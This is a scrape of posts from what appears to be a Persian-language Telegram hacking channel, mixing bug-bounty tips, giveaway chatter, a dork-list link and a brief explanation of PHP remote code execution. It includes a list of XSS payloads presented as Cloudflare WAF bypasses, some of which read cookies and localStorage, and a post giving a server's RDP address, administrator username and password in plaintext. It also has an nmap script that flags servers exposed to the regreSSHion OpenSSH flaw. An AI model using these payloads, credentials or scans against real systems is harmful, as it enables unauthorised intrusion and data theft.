🤣6🗿4👎3⚡1
👎10🗿5🤣2👍1
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡8🤯2👎1🗿1
آسیب پذیری Remote Code execution و یا به اختصار RCE یک نوع آسیب پذیری ریموت میباشد .
که به نفوذ گر امکان اجرای دستور دلخواه او را میدهد ، این آسیب پذیری بر اساس یک اشکال برنامه نویسی صورت میگیرد .
در هنگام استفاده از تابع Get در PHP اگر مقدار دریافتی را به درستی تعریف نکنیم با این آسیب پذیری مواجع میشویم . این مقدار میتواند بصورت یک متغیر در برنامه ما باشد . که در صورت بروز مشکل ما میتوانیم یک مقدار بصورت دلخواه به آن وارد کنیم به
تابع set را برای دادن مقدار به متغیرها در برنامه ها و تابع get را برای گرفتن مقدار متغیر ها و نمایش آنها در برنامه ها استفاده میکنیم.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5💯4🔥3
This media is not supported in your browser
VIEW IN TELEGRAM
بدون شرح...
دیس ایز کیبورد🤡
دیس ایز کیبورد
Please open Telegram to view this post
VIEW IN TELEGRAM
🤣7🗿3
🔥5👍2💯1
LazyEgg - Hunting JS Files ⭐️
#BugBounty #Tips
🔹 🔺 🔹 🔺 🔹 🔺 🔹 🔺 🔹
⭐ Erohack
💧 Boost
🐦 Twitter
waybackurls target | grep '\.js$' | awk -F '?' '{print $1}' | sort -u | xargs -I{} bash -c 'echo -e "\ntarget : {}\n" && python lazyegg[.]py "{}" --js_urls --domains --ips'
#BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡7👍1💯1
⭕️ دوستان عزیز این ایردراپ های که تو چنل معرفی میکنم صرفا به درخواست دوستانه و سعی من بر این بوده که ایردراپی معرفی کنه که واقعا پول بده و اینکه خیلی کم من ایردراپ معرفی میکنم و از محتوای اصلی چنل خارج نمیشم.
جدیدا خیلی از چنل های تلگرامی که داخلشون جوین هستم از تست نفوذ بگیر تا باگ بانتی و معرف پیلود ها محتوای اصلی چنل رو ول کردن تمام تمرکز خودشون گذاشتن برای معرفی ایردراپ و فروش فیلترشکن اخه چرا کسی دلیلشو میدونه؟ 🤨 😑
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5🗿3
A million dorks😎
🚫 🚫 🚫 🚫 🚫 🚫 🚫 🚫 🚫 🚫
❎ By entering this GitHub page, you have access to all these remote jobs, and you must use Google Hacking to use these remote jobs.❎
📱 https://github.com/HackShiv/OneDorkForAll/tree/main/dorks/1M_dork
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
OneDorkForAll/dorks/1M_dork at main · SecShiv/OneDorkForAll
An insane list of all dorks taken from everywhere from various different sources. - SecShiv/OneDorkForAll
⚡6🤣2🔥1
Eʀᴏ ··ʜᴀᴄᴋ··
⭕️ برای استارت مسابقه فعلا یه سرور مجازی قرار بدیم، اگر حمایت شما بیشتر بدونه فاصله دوباره مسابقه میزاریم.🎁 زمان مسابقه 8 شب🎁 🎺 برای برگزاری مسابقه ریاکشن بزارید و چنل رو برای دوستاتون بقرستید🎺
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7💯3👍1
Eʀᴏ ··ʜᴀᴄᴋ·· pinned «⭕️ برای استارت مسابقه فعلا یه سرور مجازی قرار بدیم، اگر حمایت شما بیشتر بدونه فاصله دوباره مسابقه میزاریم. 🎁 زمان مسابقه 8 شب🎁 🎺 برای برگزاری مسابقه ریاکشن بزارید و چنل رو برای دوستاتون بقرستید🎺 »
Eʀᴏ ··ʜᴀᴄᴋ··
⭕️ ریاکشن زیر این پست فراموش نشه!⭕️ قرعهکشی ساعت 8 برگزار میشه.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7💯2🔥1
⭕️ صدای چنل رو باز کنید که رأس ساعت ۸ جایزه رو میزارم☠️
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🔥3
89.185.85.70:3389
administrator
parsa2002@!@!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4👍1💯1
<svg%0Aonauxclick=0;[1].some(confirm)//
<svg onload=alert%26%230000000040"")>
<svg onx=() onload=(confirm)(1)>
<svg onx=() onload=(confirm)(document.cookie)>
<svg onx=() onload=(confirm)(JSON.stringify(localStorage))>
#Payload #Cloudflare #Pentest
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡4🔥2💯2😐1
nmap -sV -Pn -p22 -iL servers.txt | awk '/Nmap scan report/{ip=$5} /OpenSSH/ {
if ($5 >= "8.5p1" && $5 < "9.8p1") {
status = "Vulnerable to CVE-2024-6387"
} else if ($5 >= "4.4p1" && $5 < "8.5p1") {
status = "Not vulnerable to CVE-2024-6387 (patched for CVE-2006-5051)"
} else if ($5 < "4.4p1") {
status = "Vulnerable to regreSSHion (unless patched for CVE-2006-5051 and CVE-2008-4109)"
}
if (status) {
print "Server: "ip"\t", "OpenSSH Version: "$5"\t", "Status: "status
status = ""
}
}'
#POC #CVE_2024_6387
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7⚡2😐2